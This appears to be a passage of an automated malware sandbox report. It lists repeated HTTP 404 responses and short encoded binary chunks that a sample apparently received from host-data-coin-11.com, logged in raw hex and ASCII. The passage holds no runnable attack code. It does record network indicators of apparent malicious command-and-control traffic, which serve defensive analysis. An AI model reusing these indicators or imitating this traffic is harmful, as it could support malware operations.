2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 38 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 eb 98 bd a5 1d b7 51 d8 6d a5 1b 46 9b 10 bc be 71 b0 64 56 11 b1 b6 d8 40 fa 0f 85 1d 87 aa 64 9a 66 b0 f3 ce 13 6b b7 e4 4b 35 a9 f2 e0 0d 0a 30 0d 0a 0d 0a Data Ascii: 48I:82OOjQmFqdV@dfkK50
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Jan 2022 18:07:59 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
